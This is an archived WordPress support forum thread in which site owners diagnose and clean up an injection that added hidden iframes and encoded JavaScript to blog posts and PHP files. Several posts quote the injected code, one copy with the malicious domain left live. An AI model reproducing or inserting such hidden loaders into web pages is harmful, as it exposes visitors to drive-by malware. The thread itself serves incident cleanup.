WordPress.org

Ready to get started?Download WordPress

Forums

wp-stats[1].htm Downloader Virus - Upgrade to 2.3.2 (21 posts)

  1. up2long
    Member
    Posted 6 years ago #

    Ok, I've not been able to find much on the Internet about this issue.

    I upgraded my site to 2.3.2 and when viewing the site I get an alert about a virus.

    The virus is the Downloader virus and is supposedly in wp-stats[1].htm

    Anyone else have an idea about this scenario?

    Also, I've scanned all my files and there were no viruses found.

  2. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    What is the site? There is no "wp-stats[1].htm" as part of WordPress.

  3. up2long
    Member
    Posted 6 years ago #

    The site:

    http://blogs.somelifeissues.com/

    I did a Google search for wp-stats[1].htm and came up with others who are encountering the same thing.

  4. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Some code has been inserted into your post on November 16th:

    <p>I will return to writing<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> after the New Year. Enjoy the holidays!!!</p>

    That wp-stats-php.info site is where it comes from. Edit that post and remove that code.

    Likely your site got hacked before you upgraded.

  5. up2long
    Member
    Posted 6 years ago #

    Never mind. Found it. Some how the following string got injected into one of my blogs ..gggggrrrrr

    <!-- Traffic Statistics --> <iframe height="1" width="1" frameBorder="0" src="http://www.wp-stats-XXXphp.info/iframe/wp-stats.XXXphp"></iframe><!-- End Traffic Statistics -->

    The XXX is to prevent it from happening here.

  6. up2long
    Member
    Posted 6 years ago #

    Thanks Otto. I see we found it at the same time.

    Appreciate the extra hand.

  7. Hulk
    Member
    Posted 6 years ago #

    Thanks for this post. It had infected one of my blogs as well. It was easy to view the source of my main blog page, find the two posts that had been affected, delete the code from the posts, and it was done. Does 2.3.2 prevent this from happening again?

  8. Hulk
    Member
    Posted 6 years ago #

    Duh - I just looked at the title of this thread! I will upgrade tonight!

  9. pcbenny1234
    Member
    Posted 6 years ago #

    ciao ragazzi io ho lo stesso problema e non riesco a risolverlo, aiuto! per favore. il mio sito รจ: http://www.margheritaorta.it

    -----------------------

    Hello guys I have the same problem and I can not solve it, help! Please. My site is: http://www.margheritaorta.it

  10. Ellwood
    Member
    Posted 6 years ago #

    I also got it. Same <!-- Traffic Statistics --> code was inserted in one of my posts.

    I also visited home website of a top 10 themes and when I got to red secret 01 and visited the creator's home page it attempted to run a downloader.exe, my norton detected it as a virus.

    Thanks for posting.

  11. whooami
    Member
    Posted 6 years ago #

    delete or rename your xmlrpc.php

  12. jason-morrison
    Member
    Posted 6 years ago #

    I ran into this too, this can get your site a nasty warning in Google and Firefox. Here's a post about cleaning it up.

  13. merideth
    Member
    Posted 6 years ago #

    how do you search the source of your posts? do i have to do this in the wp posts edit window? i hope not as i have 4 years worth of posts. if not, where can i find the actual post files for my blog so that i can batch search them locally?

    please, please help. and thank you so much!
    merideth
    http://house-made.com

  14. merideth
    Member
    Posted 6 years ago #

    nevermind...i think i solved it.
    :)

  15. mbshafer
    Member
    Posted 6 years ago #

    As an FYI I had this hack happen to one of my blogs last evening (03/30/08). I would note that I had upgraded to WP 2.3.3 about two weeks ago and it wasn't hacked as of yesterday afternoon. From this it would appear that WP 2.3.3 is vulnerable to this exploit.

    Cheers!
    Mike S.

  16. merideth
    Member
    Posted 6 years ago #

    ok i'm still having this problem. I did a search and didn't turn up anything with "traffic statistics" in it. I deleted the fake wp-stats file and my wordpress is updated. Any advice? Help?

    thanks so much!

    merideth
    http://house-made.com

  17. mbshafer
    Member
    Posted 6 years ago #

    Merideth,

    In attempting to access http://house-made.com Kaspersky IS 7 returns the following alert:

    The requested URL http://house-made.com/ is infected with Trojan-Clicker.HTML.IFrame.bk virus

    HTH!

    Cheers!

  18. ausetkmt
    Member
    Posted 6 years ago #

    AHHHHHHHHH !!!!!
    oooooooo I'm pulling my hair out because I've scanned all my theme files and I haven't found "Traffic Statistics".

    I searched in the comments as the suggestion was made and still I didn't find "Traffic Statistics".

    so as a temp measure I unapproved all my comments;
    and now I am stumped as to what else to do.

    my site and its mirror are both effected.
    http://badgals-radio.com/
    http://badgalsradio.com/

    I phoned my host; for what good that did.
    I asked for assistance in diagnosing and repairing the problem and
    was directed to "do it yourself". that of course means new host.

    I went to badneighborhood.com to find out from a scan what files were suspect; and I went and looked at them. only to see from the scan report that it appears I am being rated badly because of the amount of links from pages and archive posts that are in my sidebar. what can I do about this since I want my archives and my pages to be available for browsers ?

    Any and All help would be appreciated as google is making my site
    look like a real danger zone; which I assure you it is not.

    Thanks In Advance for Your Assistance and Kindness,

    ~RE Ausetkmt
    BadGalsRadio Daily Blog

  19. djouce
    Member
    Posted 6 years ago #

    My blogs have been hacked with a redirect to http://www.wp-stats-phpXXX.info which Google identifies as a Malware host. Every PHP and HTML file was infected a short piece of encoded Javascript. It was added to end of the file in the form of

    <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"\"htcogdqtfgt?2@"));</script>';?>

    I have removed some of the encoded text so that it does not work.

    The solution is to remove the code wherever it occurs. Many times in my case.

    The hacker also added several php files beginning with 'ad-'. Not sure what they do but I have also deleted them.

    My blogs seem to be clean now. I have upgraded WP and changed my passwords.

    I'm not sure how it happened. Would welcome suggestions on avoiding future attacks

  20. doublehead
    Member
    Posted 5 years ago #

    You guys are great!

    I was pulling my hair out over this. I completely reuploaded WordPress, upgraded to 2.6, deleted all files on my server that didn't seem like they belonged there, and STILL it was transfering data from http://www.wp-stats-php.com

    Teach me not to look for solutions here or ask somebody :)

  21. Anonymous
    Unregistered
    Posted 5 years ago #

    Hi,

    I tried upgrading to WordPress 2.6 just now and I noticed that my entire site got knocked off, even my other blog. Any suggestions?

Topic Closed

This topic has been closed to new replies.

About this Topic